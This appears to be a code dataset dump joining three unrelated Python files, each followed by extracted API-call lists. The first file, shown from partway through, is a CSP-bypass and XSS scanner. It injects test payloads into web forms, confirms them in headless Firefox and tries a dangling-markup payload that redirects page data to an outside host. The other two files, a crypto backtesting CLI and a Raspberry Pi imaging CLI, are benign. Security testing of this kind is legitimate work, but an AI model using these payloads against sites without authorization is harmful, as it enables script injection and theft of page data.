        cookies[name] = value
    return cookies
class Scanner:
    """Drives the scan: holds the HTTP session and CLI options, pretty-prints
    results, and (with --all-pages) collects every same-host link of the target.
    """

    def __init__(self, target, no_colors=False, dynamic=False, all_pages=False, cookies=None, secure=False):
        self.no_colors = no_colors
        self.all_pages = all_pages
        self.dynamic = dynamic
        self.target = target
        self.secure = secure
        self.pages = [self.target]
        # Fix: avoid the shared mutable-default-argument pitfall; a fresh
        # dict is created per instance (previous default was ``cookies={}``).
        self.cookies = {} if cookies is None else cookies
        self.sess = HTMLSession()

    def print(self, message=""):
        """Print *message*, stripping ANSI escape sequences when --no-colors is set."""
        if self.no_colors:
            # Raw string fixes the invalid '\[' escape warning of the old pattern;
            # the regex matches CSI color sequences like ESC[92m / ESC[0m.
            message = re.sub(r"\x1b\[[0-9;]+m", "", message)
        print(message)

    def succeed(self, message=""):
        """Log a success line (green tag)."""
        self.print(f"[\x1b[92mSUCCEED\x1b[0m] {message}")

    def info(self, message=""):
        """Log an informational line prefixed with the current time."""
        self.print(f"[\x1b[96m{date_formatted()}\x1b[0m] {message}")

    def vuln(self, message=""):
        """Log a vulnerability line (yellow tag)."""
        self.print(f"[\x1b[93mVULN\x1b[0m] {message}")

    def fail(self, message=""):
        """Log a negative-result line (magenta tag)."""
        self.print(f"[\x1b[95mFAIL\x1b[0m] {message}")

    def error(self, message=""):
        """Log an error line (red tag)."""
        self.print(f"[\x1b[91mERROR\x1b[0m] {message}")

    def banner(self):
        """Print the ASCII-art banner in the randomly chosen color."""
        self.print(f"""\x1b[{color}m
   ______ _____ ____ 
  / ____// ___/ / __ \ ____ _ _____ _____
 / /     \__ \ / /_/ // __ `// ___// ___/
/ /___ ___/ // ____// /_/ /(__ )(__ )
\____/ /____//_/ \__,_//____//____/\x1b[0m\x1b[3m by Ruulian\x1b[0m
\x1b[4mVersion\x1b[0m: 1.2
""")

    def ping(self):
        """Return True when the target answers an authenticated GET without an HTTP/network error."""
        try:
            r = self.sess.get(self.target, cookies=self.cookies, verify=self.secure)
            r.raise_for_status()
        except OSError:
            # requests' exceptions derive from OSError (connection errors, HTTPError).
            return False
        return True

    def get_all_pages(self, page):
        """Collect every same-host absolute link found on *page* into self.pages."""
        # Consistency fix: honour --secure here too; the previous request always
        # verified TLS, which broke crawling of self-signed targets that ping() accepted.
        r = self.sess.get(page, cookies=self.cookies, verify=self.secure)
        if r.text != "":
            links = r.html.absolute_links
            for link in links:
                if link not in self.pages and urlparse(link).netloc == urlparse(self.target).netloc:
                    self.pages.append(link)
                    # Small delay to stay polite with the target server.
                    time.sleep(0.3)
class Page:
    """A single page of the target: fetches and parses its CSP header,
    extracts its forms, and matches the policy against known bypasses.
    """

    def __init__(self, url, cookies, secure=False):
        self.url = url
        self.cookies = cookies
        self.secure = secure
        self.sess = HTMLSession()
        self.csp = self.get_csp()
        self.vulns = []

    def get_csp(self):
        """Fetch and parse the Content-Security-Policy header.

        :return: ``{directive: [source tokens]}`` with surrounding quotes
                 stripped from keywords like ``'self'``; empty dict if no CSP.
        """
        data = {}
        # Fix: send the session cookies as well -- an authenticated page may
        # serve a different (or absent) CSP than the anonymous one, and every
        # other request in this tool is authenticated.
        r = self.sess.head(self.url, cookies=self.cookies, verify=self.secure)
        if 'Content-Security-Policy' in r.headers.keys():
            csp = r.headers['Content-Security-Policy']
            for param in csp.strip().strip(';').split(';'):
                matched = re.search(r"^([a-zA-Z0-9\-]+)( .*)?$", param.strip())
                if matched is None:
                    # Robustness: skip malformed directives instead of
                    # crashing on ``None.groups()``.
                    continue
                csp_name, csp_values = matched.groups()
                if csp_values is not None:
                    csp_values = [v.rstrip("'").lstrip("'") for v in csp_values.strip().split(' ')]
                else:
                    csp_values = []
                data[csp_name] = csp_values
        return data

    def format_csp(self):
        """Return the parsed CSP as pretty-printed JSON (sources space-joined per directive)."""
        csp = {}
        for policyname in self.csp:
            csp[policyname] = " ".join(self.csp[policyname])
        csp = json.dumps(
            csp,
            indent=4
        )
        return csp

    def get_forms(self):
        """Return every ``<form>`` element of the page (empty list on empty body)."""
        r = self.sess.get(self.url, cookies=self.cookies)
        if r.text != "":
            forms = r.html.find("form")
            return forms
        return []

    def test_patch(self, patches):
        """Return True when any ``(directive, regex)`` patch matches the current CSP,
        i.e. the candidate bypass is neutralised (e.g. a nonce/hash source makes
        ``'unsafe-inline'`` ignored by browsers).
        """
        for patch in patches:
            patch_policy_name = patch[0]
            patch_policy_value = patch[1]
            if patch_policy_name in self.csp:
                r = re.compile(patch_policy_value)
                if any([r.match(x) for x in self.csp[patch_policy_name]]):
                    return True
        return False

    def scan(self):
        """Match the parsed CSP against ``vulnerable_CSP_conf`` and fill self.vulns.

        Honours spec fallbacks from ``policies_fallback`` (a missing
        ``script-src`` is governed by ``default-src``).
        :return: True when at least one bypass was recorded.
        """
        vuln = False
        csp_keys = self.csp.keys()
        new_csp_keys = []
        for policy, fallback in policies_fallback.items():
            if fallback in csp_keys and policy not in csp_keys:
                new_csp_keys.append((policy, fallback))
            else:
                new_csp_keys.append((policy, policy))
        for policyname in new_csp_keys:
            priority = policyname[0]
            name = policyname[1]
            # Fix: also require the resolved directive to exist -- previously a
            # CSP with neither 'script-src' nor 'default-src' raised KeyError.
            if priority in vulnerable_CSP_conf.keys() and name in self.csp:
                for exploit in vulnerable_CSP_conf[priority]:
                    if all(x in self.csp[name] for x in exploit['value']) and (exploit['patch'] == [] or not self.test_patch(exploit['patch'])):
                        policyvalue = " ".join(self.csp[name])
                        self.vulns.append({'value':f"{name} {policyvalue}", 'payload':exploit['payload']})
                        vuln = True
        return vuln
class Form:
    """An HTML form of the target page, with helpers to check whether its
    inputs are reflected unescaped and to confirm payloads in a real browser.
    """
    def __init__(self, url, action, method, names, cookies, secure=False):
        # ``names`` maps input names to preset values; '' marks an input
        # the scanner will fill with its test marker / payload.
        self.url = url
        self.action = action
        self.method = method
        self.names = names
        self.cookies = cookies
        self.secure = secure
        self.sess = HTMLSession()
    def test_dom(self):
        """Submit a harmless HTML marker through every empty input and return
        True when it comes back verbatim in the response body, i.e. the
        parameter is reflected without htmlspecialchars-style encoding.
        """
        parameters = {}
        value = "<em>random_value_t0_test</em>"
        for name, val in self.names.items():
            if val == "":
                parameters[name] = value
            else:
                # Keep preset values (e.g. hidden CSRF tokens) untouched.
                parameters[name] = val
        if self.method.lower() == "get":
            r = self.sess.get(self.action, params=parameters, cookies=self.cookies, verify=self.secure)
        elif self.method.lower() == "post":
            r = self.sess.post(self.action, data=parameters, cookies=self.cookies, verify=self.secure)
        # NOTE(review): if the form declares a method other than GET/POST,
        # ``r`` is unbound here and the next line raises NameError.
        if value in r.text:
            return True
        else:
            return False
    def exploit(self, payload, dangling=False):
        """Load the page in headless Firefox, type *payload* into every known
        input, submit the form and report success.

        Success means a JavaScript alert appeared (XSS confirmed), or -- when
        *dangling* is True -- the browser ended up on another host
        (dangling-markup redirect confirmed).
        """
        domain = urlparse(self.url).netloc
        # Send geckodriver's log to the platform's null device.
        if platform.system() == "Linux" or platform.system() == "Darwin":
            log_path = "/dev/null"
        else:
            log_path = "NUL"
        options = FirefoxOptions()
        options.add_argument("--headless")
        wb = webdriver.Firefox(options=options, service_log_path=log_path)
        wb.get(self.url)
        # Replay the authenticated session cookies inside the browser.
        for key, value in self.cookies.items():
            wb.add_cookie({'name':key, 'value':value, 'domain':domain})
        for name in self.names:
            form_input = wb.find_element_by_name(name)
            form_input.clear()
            form_input.send_keys(payload)
        form = wb.find_element_by_tag_name("form")
        form.submit()
        # Give the page a moment to load and execute the injected payload.
        time.sleep(0.5)
        exploit = False
        if dangling:
            if urlparse(wb.current_url).netloc != domain:
                exploit = True
            else:
                exploit = False
        else:
            try:
                # Wait up to 3s for an alert() fired by the payload.
                WebDriverWait(wb, 3).until(EC.alert_is_present())
                alert = wb.switch_to.alert
                alert.accept()
                exploit = True
            except TimeoutException:
                exploit = False
        wb.close()
        return exploit
def parse_args():
    """Build the command-line interface and parse the supplied arguments."""
    cli = argparse.ArgumentParser(add_help=True, description='CSP Bypass tool')
    cli.add_argument("--no-colors", dest="no_colors", action="store_true", help="Disable color mode")
    cli.add_argument("-d", "--dynamic", dest="dynamic", action="store_true", help="Use dynamic mode")
    cli.add_argument("-a", "--all-pages", dest="all_pages", action="store_true", help="Looking for vulnerability in all pages could be found", required=False)
    cli.add_argument("-k", "--secure", dest="secure", action="store_true", help="Check SSL certificate")
    target_group = cli.add_argument_group("Required argument")
    target_group.add_argument("-t", "--target", dest="target", help="Specify the target url", required=True)
    auth_group = cli.add_argument_group("Authentication")
    auth_group.add_argument("-c", "--cookies", dest="cookies", help="Specify the cookies (key=value)", type=parse_cookies, required=False, default={})
    return cli.parse_args()
# Entry point: parse CLI options, verify the target is reachable, optionally
# crawl every same-host page, then test each discovered form for unescaped
# reflection and CSP bypasses (optionally confirming payloads in a browser).
if __name__ == '__main__':
    args = parse_args()
    scan = Scanner(target=args.target, no_colors=args.no_colors, dynamic=args.dynamic, all_pages=args.all_pages, cookies=args.cookies, secure=args.secure)
    scan.banner()
    scan.info(f"Starting scan on target \x1b[1m{scan.target}\x1b[0m\n")
    scan.info("Pinging page")
    if scan.ping():
        scan.info("Page found\n")
    else:
        # Unreachable target: nothing to scan.
        scan.error("Page not found")
        exit()
    if scan.all_pages:
        scan.info("Detecting all pages...")
        scan.get_all_pages(scan.target)
        scan.info(f"{len(scan.pages)} pages found\n")
    for p in scan.pages:
        page = Page(p, scan.cookies, secure=scan.secure)
        scan.info(f"Scanning page: \x1b[1m{page.url}\x1b[0m")
        forms = page.get_forms()
        if forms != []:
            for form in forms:
                # Resolve the form's submission URL and HTTP method,
                # defaulting to the page itself and GET.
                if 'action' in form.attrs and form.attrs['action'] != '':
                    action = form.attrs['action']
                else:
                    action = page.url
                if 'method' in form.attrs:
                    method = form.attrs['method']
                else:
                    method = "GET"
                inputs = form.find("input") + form.find("textarea")
                names = {}
                # Collect input names: hidden fields keep their preset value
                # (e.g. CSRF tokens), visible ones are marked '' for injection.
                for input_tag in inputs:
                    if "name" in input_tag.attrs:
                        name = input_tag.attrs["name"]
                        if "type" in input_tag.attrs and input_tag.attrs["type"] == "hidden":
                            try:
                                names[name] = input_tag.attrs["value"]
                            except:
                                pass
                        else:
                            names[name] = ''
                new_form = Form(page.url, urljoin(page.url, action), method, names, scan.cookies, scan.secure)
                if new_form.test_dom():
                    scan.info("Parameter reflected in DOM and no htmlspecialchars detected")
                    if page.csp != {}:
                        csps = page.format_csp()
                        scan.print()
                        scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
                        scan.print(csps)
                        scan.print(f" [\x1b[{color}mContent-Security-Policy\x1b[0m] ".center(74, "="))
                        scan.print()
                        if page.scan():
                            vulns = page.vulns
                            scan.info(f"Number of vulnerabilities found: {len(vulns)}\n")
                            for vuln in vulns:
                                scan.vuln(f"Vulnerability: \x1b[1m{vuln['value']}\x1b[0m")
                                scan.vuln(f"Payload: {vuln['payload']}\n")
                            # Dynamic mode: confirm each candidate payload in headless Firefox.
                            if scan.dynamic:
                                scan.info(f"Starting dynamic mode ...")
                                for vuln in vulns:
                                    scan.info(f"Testing: \x1b[1m{vuln['value']}\x1b[0m")
                                    if new_form.exploit(vuln['payload']):
                                        scan.succeed(f"Payload found on \x1b[1m{page.url}\x1b[0m")
                                        scan.succeed(f"Payload: {vuln['payload']}\n")
                                    else:
                                        scan.fail("Payload tested didn't work\n")
                        else:
                            scan.fail(f"No XSS found\n")
                            # No scriptable bypass: fall back to dangling-markup exfiltration.
                            if scan.dynamic:
                                scan.info("Testing Dangling Markup ...")
                                dangling_markup_payload = "<meta http-equiv=\"refresh\" content='0; url=https://0xhorizon.eu?data="
                                if new_form.exploit(dangling_markup_payload, True):
                                    scan.succeed(f"Dangling markup payload found: {dangling_markup_payload}\n")
                                else:
                                    scan.fail("No dangling markup detected\n")
                            else:
                                scan.info("Perhaps you can exploit Dangling Markup\n")
                    else:
                        scan.fail(f"No CSP on page {page.url}\n")
                else:
                    scan.fail("No parameter reflected in DOM or htmlspecialchars detected\n")
        else:
            scan.fail("No form found on this page\n")
scan.info("Scan finished")
| [
"random.choice",
"selenium.webdriver.support.ui.WebDriverWait",
"urllib.parse.urlparse",
"argparse.ArgumentParser",
"re.compile",
"selenium.webdriver.support.expected_conditions.alert_is_present",
"json.dumps",
"selenium.webdriver.Firefox",
"time.sleep",
"argparse.ArgumentTypeError",
"urllib3.di... | [((603, 670), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (627, 670), False, 'import urllib3\n'), ((680, 700), 'random.choice', 'choice', (['[35, 93, 33]'], {}), '([35, 93, 33])\n', (686, 700), False, 'from random import choice\n'), ((20011, 20080), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(True)', 'description': '"""CSP Bypass tool"""'}), "(add_help=True, description='CSP Bypass tool')\n", (20034, 20080), False, 'import argparse\n'), ((13311, 13324), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (13322, 13324), False, 'from requests_html import HTMLSession\n'), ((15145, 15158), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (15156, 15158), False, 'from requests_html import HTMLSession\n'), ((16044, 16069), 'json.dumps', 'json.dumps', (['csp'], {'indent': '(4)'}), '(csp, indent=4)\n', (16054, 16069), False, 'import json\n'), ((17988, 18001), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (17999, 18001), False, 'from requests_html import HTMLSession\n'), ((18924, 18940), 'selenium.webdriver.firefox.options.Options', 'FirefoxOptions', ([], {}), '()\n', (18938, 18940), True, 'from selenium.webdriver.firefox.options import Options as FirefoxOptions\n'), ((18997, 19058), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'options': 'options', 'service_log_path': 'log_path'}), '(options=options, service_log_path=log_path)\n', (19014, 19058), False, 'from selenium import webdriver\n'), ((19463, 19478), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (19473, 19478), False, 'import time\n'), ((12571, 12594), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (12592, 12594), False, 'import datetime\n'), ((13408, 13450), 're.sub', 're.sub', (['"""\x1b[\\\\[]([0-9;]+)m"""', '""""""', 'message'], {}), "('\\x1b[\\\\[]([0-9;]+)m', '', 
message)\n", (13414, 13450), False, 'import re\n'), ((18728, 18746), 'urllib.parse.urlparse', 'urlparse', (['self.url'], {}), '(self.url)\n', (18736, 18746), False, 'from urllib.parse import urljoin, urlparse\n'), ((12852, 12922), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['"""Cookies must be specified with key=value"""'], {}), "('Cookies must be specified with key=value')\n", (12878, 12922), False, 'import argparse\n'), ((16530, 16560), 're.compile', 're.compile', (['patch_policy_value'], {}), '(patch_policy_value)\n', (16540, 16560), False, 'import re\n'), ((18765, 18782), 'platform.system', 'platform.system', ([], {}), '()\n', (18780, 18782), False, 'import platform\n'), ((18797, 18814), 'platform.system', 'platform.system', ([], {}), '()\n', (18812, 18814), False, 'import platform\n'), ((14955, 14970), 'time.sleep', 'time.sleep', (['(0.3)'], {}), '(0.3)\n', (14965, 14970), False, 'import time\n'), ((19540, 19564), 'urllib.parse.urlparse', 'urlparse', (['wb.current_url'], {}), '(wb.current_url)\n', (19548, 19564), False, 'from urllib.parse import urljoin, urlparse\n'), ((19738, 19759), 'selenium.webdriver.support.expected_conditions.alert_is_present', 'EC.alert_is_present', ([], {}), '()\n', (19757, 19759), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((22840, 22865), 'urllib.parse.urljoin', 'urljoin', (['page.url', 'action'], {}), '(page.url, action)\n', (22847, 22865), False, 'from urllib.parse import urljoin, urlparse\n'), ((19711, 19731), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['wb', '(3)'], {}), '(wb, 3)\n', (19724, 19731), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((14836, 14850), 'urllib.parse.urlparse', 'urlparse', (['link'], {}), '(link)\n', (14844, 14850), False, 'from urllib.parse import urljoin, urlparse\n'), ((14861, 14882), 'urllib.parse.urlparse', 'urlparse', (['self.target'], {}), '(self.target)\n', (14869, 14882), False, 'from urllib.parse 
import urljoin, urlparse\n')] |
"""TODO: Add file description."""
import curio # async library
import logging # python standard logging library
import click # command line interface creation kit (click)
import click_log # connects the logger output to click output
from datasources.binance_csv import BinanceCSV
from datasources.binance_api import binance_api
from strategies.moving_average import moving_average
from strategies.dca import DCA
from exchanges.fake_exchange import FakeExchange
# Configure root logging once at import time: every record is mirrored to a
# fresh log file (truncated on each run) and to the console.
logging.basicConfig(
    # With style='{' the formatted record text is '{message}'; the original
    # '{msg}' is the raw template attribute, so lazy %-style arguments
    # (logger.info("x=%s", x)) would never be interpolated into the output.
    format='{asctime} - {name}: {levelname} $ {message}',
    style='{',
    level=logging.INFO,
    handlers=[
        logging.FileHandler("last_run.log", mode='w'),
        logging.StreamHandler()
    ]
)
# Module-level logger; click_log hooks it into click's output handling so the
# --verbosity option (see the backtest command) can control it.
logger = logging.getLogger(__name__)
click_log.basic_config(logger)
LOGO = '''
__ __
____ ____ ______/ /_ ____ / /_ ____ _____ ____ _____ ____ _
/ __ \/ __ `/ ___/ __ \/ __ \______/ __ \/ __ `/ __ \/ __ `/ __ \/ __ `/
/ / / / /_/ / /__/ / / / /_/ /_____/ /_/ / /_/ / / / / /_/ / / / / /_/ /
/_/ /_/\__,_/\___/_/ /_/\____/ /_.___/\__,_/_/ /_/\__,_/_/ /_/\__,_/
''' # noqa: E501, W291, W605
# Registries mapping CLI option strings to the concrete program modules and
# classes. The keys double as the click.Choice values used by the commands
# below, so renaming a key changes the command-line interface.
strategy_dict = {
    "moving_average": moving_average,
    "dca": DCA,
}
exchange_dict = {
    "fake_exchange": FakeExchange,
}
datasource_dict = {
    "binance_csv": BinanceCSV,
    "binance_api": binance_api,
}
@click.command()
@click.option(
    '--strategy',
    help='Which strategy to use',
    type=click.Choice(strategy_dict.keys(), case_sensitive=False)
)
@click.option(
    '--strategy_params',
    help='The parameters for the strategy, as a comma-separated list'
)
@click.option(
    '--exchange',
    help='Which exchange to use',
    type=click.Choice(exchange_dict.keys())
)
@click.option(
    '--datasource',
    help='Which data source class to use',
    type=click.Choice(list(datasource_dict.keys()))
)
@click.option(
    '--datasource_path',
    help='The path to the datasource csv or api endpoint',
    type=click.Path(
        exists=True,
        file_okay=True,
        dir_okay=False,
        writable=False,
        readable=True,
        resolve_path=False,
        allow_dash=True,
        path_type=str
    ),
    required=False
)
@click_log.simple_verbosity_option(logger)
def backtest(strategy, strategy_params, exchange, datasource, datasource_path):
    """Run a strategy over historical data on a simulated exchange.

    --strategy, --strategy_params, --exchange and --datasource are all
    required; --datasource_path is only needed by file/endpoint-backed
    datasources.
    """
    if any(
        [
            strategy is None,
            strategy_params is None,
            exchange is None,
            datasource is None
        ]
    ):
        click.echo(
            (
                'Argument error. Run main.py backtest --help for info on the '
                'arguments'
            )
        )
        # Bail out here: without this return we would fall through and crash
        # on a KeyError/TypeError when looking up the missing arguments.
        return
    # We don't need to handle the case of these assignments failing because
    # validation is handled for us by click
    # TODO: --datasource_path is required for some strategies but not others
    # - not sure how to get this working properly in click.
    strategy_object = strategy_dict[strategy]
    exchange_object = exchange_dict[exchange]
    datasrce_object = datasource_dict[datasource]
    from backtest import backtest_runner as bt
    curio.run(
        bt.run, strategy_object, exchange_object, datasrce_object,
        strategy_params, datasource_path
    )
# output_ddca = strategy_ddca.run('app/strategies/ddca.ini')
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option(
    '--strategy_params',
    help='The parameters for the strategy, as a comma-separated list'
)
@click.option('--exchange', help='Which exchange to use')
@click.option('--datasource', help='Which data source class to use')
def connect_to_api(strategy, strategy_params, exchange, datasource):
    """TODO: Add description."""
    # Placeholder command: live-trading mode is not implemented yet, so we
    # only log a note saying what will eventually happen here.
    placeholder_msg = (
        "This is where in the future we will connect to a live api and run "
        "the strategy indefinitely."
    )
    logger.info(placeholder_msg)
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option('--datasource', help='Which data source class to use')
@click.option(
    '--datasource_path',
    help='The path to the datasource csv (if applicable)'
)
def optimise(strategy, datasource, datasource_path):
    """TODO: Add description."""
    # Placeholder command: parameter optimisation is not implemented yet, so
    # we only log a note saying what will eventually happen here.
    todo_note = (
        "This is where in the future we will run a training algorithm to "
        "optimise the params of the strategy"
    )
    logger.info(todo_note)
# Register the CLI commands
@click.group()
def cli():
    """TODO: Add description."""


# Attach every subcommand to the group, preserving registration order.
for _command in (backtest, connect_to_api, optimise):
    cli.add_command(_command)

# Entrypoint: show the banner, then hand control to click.
if __name__ == '__main__':
    logger.info(LOGO)
    cli()
| [
"logging.getLogger",
"logging.StreamHandler",
"click_log.basic_config",
"click.option",
"click.group",
"click.echo",
"click.Path",
"logging.FileHandler",
"curio.run",
"click.command",
"click_log.simple_verbosity_option"
] | [((739, 766), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (756, 766), False, 'import logging\n'), ((767, 797), 'click_log.basic_config', 'click_log.basic_config', (['logger'], {}), '(logger)\n', (789, 797), False, 'import click_log\n'), ((1611, 1626), 'click.command', 'click.command', ([], {}), '()\n', (1624, 1626), False, 'import click\n'), ((1763, 1868), 'click.option', 'click.option', (['"""--strategy_params"""'], {'help': '"""The parameters for the strategy, as a comma-separated list"""'}), "('--strategy_params', help=\n 'The parameters for the strategy, as a comma-separated list')\n", (1775, 1868), False, 'import click\n'), ((2459, 2500), 'click_log.simple_verbosity_option', 'click_log.simple_verbosity_option', (['logger'], {}), '(logger)\n', (2492, 2500), False, 'import click_log\n'), ((3590, 3605), 'click.command', 'click.command', ([], {}), '()\n', (3603, 3605), False, 'import click\n'), ((3607, 3663), 'click.option', 'click.option', (['"""--strategy"""'], {'help': '"""Which strategy to use"""'}), "('--strategy', help='Which strategy to use')\n", (3619, 3663), False, 'import click\n'), ((3665, 3770), 'click.option', 'click.option', (['"""--strategy_params"""'], {'help': '"""The parameters for the strategy, as a comma-separated list"""'}), "('--strategy_params', help=\n 'The parameters for the strategy, as a comma-separated list')\n", (3677, 3770), False, 'import click\n'), ((3777, 3833), 'click.option', 'click.option', (['"""--exchange"""'], {'help': '"""Which exchange to use"""'}), "('--exchange', help='Which exchange to use')\n", (3789, 3833), False, 'import click\n'), ((3835, 3902), 'click.option', 'click.option', (['"""--datasource"""'], {'help': '"""Which data source class to use"""'}), "('--datasource', help='Which data source class to use')\n", (3847, 3902), False, 'import click\n'), ((4147, 4162), 'click.command', 'click.command', ([], {}), '()\n', (4160, 4162), False, 'import click\n'), ((4164, 4220), 
'click.option', 'click.option', (['"""--strategy"""'], {'help': '"""Which strategy to use"""'}), "('--strategy', help='Which strategy to use')\n", (4176, 4220), False, 'import click\n'), ((4222, 4289), 'click.option', 'click.option', (['"""--datasource"""'], {'help': '"""Which data source class to use"""'}), "('--datasource', help='Which data source class to use')\n", (4234, 4289), False, 'import click\n'), ((4291, 4384), 'click.option', 'click.option', (['"""--datasource_path"""'], {'help': '"""The path to the datasource csv (if applicable)"""'}), "('--datasource_path', help=\n 'The path to the datasource csv (if applicable)')\n", (4303, 4384), False, 'import click\n'), ((4653, 4666), 'click.group', 'click.group', ([], {}), '()\n', (4664, 4666), False, 'import click\n'), ((3396, 3502), 'curio.run', 'curio.run', (['bt.run', 'strategy_object', 'exchange_object', 'datasrce_object', 'strategy_params', 'datasource_path'], {}), '(bt.run, strategy_object, exchange_object, datasrce_object,\n strategy_params, datasource_path)\n', (3405, 3502), False, 'import curio\n'), ((2789, 2877), 'click.echo', 'click.echo', (['"""Argument error. Run main.py backtest --help for info on the arguments"""'], {}), "(\n 'Argument error. 
Run main.py backtest --help for info on the arguments')\n", (2799, 2877), False, 'import click\n'), ((2227, 2369), 'click.Path', 'click.Path', ([], {'exists': '(True)', 'file_okay': '(True)', 'dir_okay': '(False)', 'writable': '(False)', 'readable': '(True)', 'resolve_path': '(False)', 'allow_dash': '(True)', 'path_type': 'str'}), '(exists=True, file_okay=True, dir_okay=False, writable=False,\n readable=True, resolve_path=False, allow_dash=True, path_type=str)\n', (2237, 2369), False, 'import click\n'), ((635, 680), 'logging.FileHandler', 'logging.FileHandler', (['"""last_run.log"""'], {'mode': '"""w"""'}), "('last_run.log', mode='w')\n", (654, 680), False, 'import logging\n'), ((694, 717), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (715, 717), False, 'import logging\n')] |
import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
    """Report *msg* on stderr; with show=True, dump the active traceback
    (followed by a blank line) first."""
    if show:
        # format_exc() produces the same text print_exc() would emit; the
        # extra "\n" reproduces the blank separator line.
        sys.stderr.write(traceback.format_exc() + "\n")
    click.echo(msg, file=sys.stderr)
# Root command group. The --traceback flag is stashed on the click context
# object so every subcommand can pass it through to eprint().
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
              help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
    # NOTE: the 'traceback' parameter (bound by click from --traceback)
    # shadows the imported traceback module inside this function body;
    # harmless here, since the module is not used in cli().
    ctx.ensure_object(dict)
    ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
              help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
    """Create a provisioning configuration."""
    # Delegate to the provisioning module; surface any failure on stderr
    # instead of letting the traceback escape.
    try:
        provisioning.create(hidden)
    except Exception as error:
        eprint(f'Creating provisioning configuration failed ({error}).',
               show=ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
              type=click.Path(file_okay=False),
              default='~/.cache/bake-a-py',
              help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
              help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
              help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
              help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
              help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
              help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
              help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
              help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
          encrypted):
    """Write the image.

    OS is the image name (one of the results of the list command).

    This command downloads, extracts, checks integrity, writes and
    provisions if necessary.
    """
    # NOTE: the 'os' parameter name is fixed by the OS click argument and
    # shadows the stdlib os module name (not imported in this file).
    try:
        iu.write(os, image_cache, output, target, chksum, become, remove, keep,
                 encrypted)
    except Exception as exc:
        eprint(f'Writing failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
              help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
              help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
    """Provision the os on OUTPUT for TARGET.
    TARGET is the name of the configuration file.
    """
    # Hand off to imaging_utility; report any failure via eprint instead of
    # letting the traceback escape.
    try:
        iu.provision(target, output, encrypted)
    except Exception as error:
        eprint(f'Provisioning failed ({error}).',
               show=ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
    """Mount all partitions on DEVICE."""
    # udisks2 does the actual mounting; failures are reported, not raised.
    try:
        iu.udisks2.mount(device)
    except Exception as error:
        eprint(f'Mounting {device} failed ({error}).',
               show=ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
    """Unmount all partitions on DEVICE."""
    # udisks2 does the actual unmounting; failures are reported, not raised.
    try:
        iu.udisks2.unmount(device)
    except Exception as error:
        eprint(f'Unmounting {device} failed ({error}).',
               show=ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
              help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
    """List available OS images."""
    # NOTE: both the function name 'list' and the parameter 'all' shadow
    # builtins, but click derives the command name and the flag from them,
    # so renaming either would change the CLI.
    try:
        names = iu.get_all_images() if all else iu.get_raspios_flavors()
        click.echo('\n'.join(names))
    except Exception as error:
        eprint(f'Listing OS images failed ({error}).',
               show=ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
              help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
    """Display the description of the OS image NAME.
    """
    try:
        details = iu.get_image_description(name)
        # --verbose dumps the whole record, otherwise just its summary text.
        click.echo(details if verbose else details['description'])
    except Exception as error:
        eprint(f'Displaying description of {name} failed ({error}).',
               show=ctx.obj['TRACEBACK'])
if __name__ == '__main__':
cli(obj={}) | [
"click.argument",
"click.group",
"click.option",
"click.echo",
"click.Path",
"click.version_option",
"traceback.print_exc"
